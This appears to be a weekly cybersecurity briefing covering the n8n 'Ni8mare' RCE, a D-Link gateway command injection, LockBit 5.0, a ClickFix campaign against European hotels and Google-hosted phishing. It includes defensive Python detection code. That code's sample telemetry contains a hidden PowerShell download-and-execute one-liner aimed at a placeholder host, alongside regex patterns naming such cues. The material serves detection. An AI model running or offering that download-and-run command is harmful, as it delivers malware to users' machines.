Cyber Security Weekly Briefing, 3-9 January

January 9, 2026

Ni8mare: RCE vulnerability with CVSSv3 10.0 in n8n automation platform

Cyera researchers have identified a maximum severity remote code execution (RCE) vulnerability (CVSSv3 10.0), listed as CVE-2026-21858, in the n8n workflow automation tool. The flaw, nicknamed Ni8mare, allows unauthenticated attackers to take full control of the server by injecting commands into specific node execution processes.

This weakness lies in insufficient validation of user input, and successful exploitation grants complete control over the n8n instance, with a direct impact on the confidentiality, integrity, and availability of automation flows and managed credentials. Because this platform integrates with databases and corporate credentials, compromise of the server implies a systemic risk of data exfiltration. Organizations are urged to update to the patched versions released by the vendor and to restrict access to the management interface.

More info

D-Link warns of active exploitation of CVE-2026-0625, critical command injection vulnerability

D-Link has confirmed, following a report from security firm VulnCheck, a critical unauthenticated command injection vulnerability tracked as CVE-2026-0625 (CVSSv3 9.3 according to VulnCheck) affecting several legacy DSL gateway models (DSL-526B ≤ 2.01, DSL-2640B ≤ 1.07, DSL-2740R < 1.17, DSL-2780B ≤ 1.01.14). The problem is due to insufficient input sanitization in the dnscfg.cgi CGI endpoint, allowing remote attackers to inject and execute arbitrary shell commands with serious confidentiality, integrity and availability impact.

These devices are end-of-life/end-of-service with no patches available, so D-Link urges owners to retire or replace them with supported equipment or isolate them in non-critical networks. Although no public proof-of-concept exploit has been widely published, active exploitation by unnamed threat actors has been observed.

More info

LockBit 5.0: Technical analysis of the new version of the ransomware

AhnLab has published an in-depth analysis of LockBit 5.0, the most recent evolution of this ransomware family. Version 5.0 brings significant changes to its evasion capabilities and encryption techniques. This release employs hybrid cryptographic algorithms to speed up the encryption of large volumes of data and uses code obfuscation techniques to hinder analysis by traditional EDR and antivirus solutions. LockBit 5.0 maintains its Ransomware-as-a-Service (RaaS) model, making it easy for affiliates with varying levels of experience to adopt.

It also incorporates new functionality for automated data exfiltration and selective deletion of shadow copy backups. In addition, it uses custom scripts to disable system defenses and ensures persistence by manipulating the Windows registry. Recommended countermeasures include network segmentation, the use of multi-factor authentication (MFA), and active monitoring for anomalous encryption processes.

More info

PHALT#BLYX: ClickFix campaign against the hospitality sector in Europe

Securonix has identified a sophisticated cyberattack campaign dubbed PHALT#BLYX, attributed to Russian threat actors, which primarily targets the hospitality sector, especially in European countries. Malicious activity begins with phishing emails that impersonate Booking.com, using lures about the cancellation of high-value reservations to redirect victims to fraudulent websites. Once there, the ClickFix social engineering technique is used: a fake blue screen (BSOD) and a CAPTCHA error are shown to trick the user into manually pasting and executing a PowerShell command in the Windows Run dialog.

The attack evades defenses by using legitimate tools such as MSBuild.exe to compile and execute the final payload, a heavily obfuscated version of DCRat. This malware provides full remote access (RAT), system persistence, keylogging capability, and the ability to deploy secondary payloads after disabling Windows Defender. Training employees against ClickFix tactics and monitoring for anomalous executions of development tools such as MSBuild are recommended.
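The detection recommendation above (watch for development tools such as MSBuild being launched in unusual ways) can be turned into simple process-telemetry heuristics. The following is an added example, not code from Securonix or from the report: it runs two checks over constructed process-creation events. The field names (`image`, `parent_image`, `command_line`) are an assumption modelled on Sysmon-style records, the sample events are constructed, and the assumption that a command pasted into the Run dialog appears as a child of explorer.exe is stated in the code.

```python
"""Heuristics for the ClickFix -> PowerShell -> MSBuild execution chain.

Added example with constructed telemetry; field names mirror a Sysmon-style
process-creation record (an assumption, adapt to your EDR's schema).
"""
import json
import re

# Constructed sample events (JSON lines). Hosts/paths are placeholders.
SAMPLE_EVENTS = r"""
{"pid": 1, "image": "C:\\Windows\\explorer.exe", "parent_image": "C:\\Windows\\System32\\userinit.exe", "command_line": "explorer.exe"}
{"pid": 2, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell -w hidden -c \"iex (iwr http://placeholder.invalid/x)\""}
{"pid": 3, "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "MSBuild.exe C:\\Users\\alice\\AppData\\Local\\Temp\\build.xml"}
{"pid": 4, "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "parent_image": "C:\\Program Files\\Microsoft Visual Studio\\devenv.exe", "command_line": "MSBuild.exe C:\\src\\app\\app.csproj /t:Build"}
{"pid": 5, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "powershell -File C:\\scripts\\backup.ps1"}
"""

# Scripting hosts that normally have no business launching MSBuild.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Project files in user-writable locations are unusual for a real build.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|users\\public|programdata|downloads)\\", re.I)
# Cues typical of a pasted one-liner: hidden window, encoded command, download-and-run.
PS_CUES = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|"
    r"\biwr\b|invoke-webrequest|downloadstring|https?://)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious (empty list when it is not)."""
    reasons = []
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event.get("command_line", "")
    # Assumption: a command pasted into the Run dialog is spawned by explorer.exe.
    if image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and PS_CUES.search(cmd):
        reasons.append("PowerShell spawned by explorer.exe with hidden-window/download cues (Run-dialog paste pattern)")
    if image == "msbuild.exe":
        if parent in SCRIPT_HOSTS:
            reasons.append(f"MSBuild.exe launched by scripting host {parent}")
        if USER_WRITABLE.search(cmd):
            reasons.append("MSBuild.exe given a project file in a user-writable location")
    return reasons


def detect(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (pid, reasons) for every flagged event, preserving order."""
    return [(e["pid"], r) for e in events if (r := classify(e))]


if __name__ == "__main__":
    for pid, reasons in detect(parse_events(SAMPLE_EVENTS)):
        print(pid, "; ".join(reasons))
```

Events 2 and 3 are flagged (the pasted PowerShell and the MSBuild run it spawns against a project file in Temp), while the developer's MSBuild build and the scheduled backup script are not; the parent-process rule is the one that keeps noise low on workstations where MSBuild is legitimately used.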

More info

Abuse of Google infrastructure for highly evasive phishing campaigns

RavenMail has published an article describing a campaign that abuses legitimate functionality of Google's infrastructure, such as Google Cloud Application Integration and associated services, to send phishing emails from real Google addresses that pass all authentication checks (SPF, DKIM, DMARC) without any need to spoof domains or compromise servers. The links pointed to Google Cloud Storage (storage.cloud.google.com), then redirected to googleusercontent.com to display a fake CAPTCHA, and finally led to a fake Microsoft login page on a malicious domain to steal credentials.

In December 2025, the campaign targeted more than 3000 organizations, mainly in the manufacturing sector but also in technology and finance, with almost 9400 emails sent. This attack underscores the need to strengthen email security with context-based detection rather than reputation alone, and to train users to recognize emails with unexpected urgency, deceptive redirects, and messages that use legitimate services in unexpected ways.
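The point that authentication results alone do not clear a message can be shown with a small triage routine. This is an added example, not RavenMail's code: it parses two constructed messages, confirms that SPF, DKIM and DMARC all pass, and still raises the message for review because of context (a link hosted on a shared cloud storage host named in the article, a link host that does not belong to the sender's domain, urgency language). The sender addresses, hosts and the list of abusable storage hosts beyond those named in the article are placeholders and assumptions.

```python
"""Context-based triage of an email that passes SPF/DKIM/DMARC.

Added example; the two messages below are constructed and use placeholder
domains (.invalid). The list of shared hosting hosts is an assumption built
from the hosts named in the article.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Legitimate hosts that anyone can publish content on, so a link there says
# nothing about who sent the mail (first two are from the article; assumption).
SHARED_HOSTS = ("storage.cloud.google.com", "googleusercontent.com", "storage.googleapis.com")
URGENCY = re.compile(r"(action required|verify (your account )?now|within 24 hours|immediately|will be suspended)", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"')]+")

# Constructed phishing-style message: authentication passes, context does not.
SAMPLE_PHISH = """\
From: Workspace Notice <noreply@placeholder-sender.invalid>
To: alice@victim.invalid
Subject: Action required: verify your account within 24 hours
Authentication-Results: mx.victim.invalid; spf=pass smtp.mailfrom=placeholder-sender.invalid; dkim=pass header.d=placeholder-sender.invalid; dmarc=pass header.from=placeholder-sender.invalid
Content-Type: text/plain; charset=utf-8

Your mailbox will be suspended. Review the notice here:
https://storage.cloud.google.com/placeholder-bucket/notice.html
"""

# Constructed benign message from the same sender domain.
SAMPLE_BENIGN = """\
From: Newsletter <news@placeholder-sender.invalid>
To: alice@victim.invalid
Subject: January product update
Authentication-Results: mx.victim.invalid; spf=pass smtp.mailfrom=placeholder-sender.invalid; dkim=pass header.d=placeholder-sender.invalid; dmarc=pass header.from=placeholder-sender.invalid
Content-Type: text/plain; charset=utf-8

Read what is new this month:
https://www.placeholder-sender.invalid/blog/january
"""


def host_matches(host: str, domain: str) -> bool:
    """True when host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def auth_results(msg) -> dict:
    """Simplified parse of Authentication-Results into {'spf': 'pass', ...}."""
    header = msg.get("Authentication-Results", "")
    return {k.lower(): v.lower() for k, v in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header, re.I)}


def assess(raw: str) -> dict:
    """Return authentication status, context reasons and a verdict for one message."""
    msg = email.message_from_string(raw, policy=policy.default)
    sender_domain = parseaddr(msg["From"])[1].rsplit("@", 1)[-1].lower()
    body = msg.get_body(preferencelist=("plain",)).get_content()
    auth = auth_results(msg)
    auth_pass = all(auth.get(k) == "pass" for k in ("spf", "dkim", "dmarc"))

    reasons = []
    for url in URL_RE.findall(body):
        host = (urlparse(url).hostname or "").lower()
        if any(host_matches(host, h) for h in SHARED_HOSTS):
            reasons.append(f"link hosted on shared cloud service {host}")
        elif not host_matches(host, sender_domain):
            reasons.append(f"link host {host} does not belong to sender domain {sender_domain}")
    if URGENCY.search(f"{msg['Subject']}\n{body}"):
        reasons.append("urgency language in subject or body")

    # Authentication is recorded but never lowers the score: it only proves
    # the message left the sending service, not that the content is safe.
    verdict = "review" if len(reasons) >= 2 else "deliver"
    return {"auth_pass": auth_pass, "reasons": reasons, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, assess(raw))
```

Both messages carry identical passing authentication results; only the context (where the link points and how the text pressures the reader) separates them, which is the gap a reputation-only filter leaves open.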

More info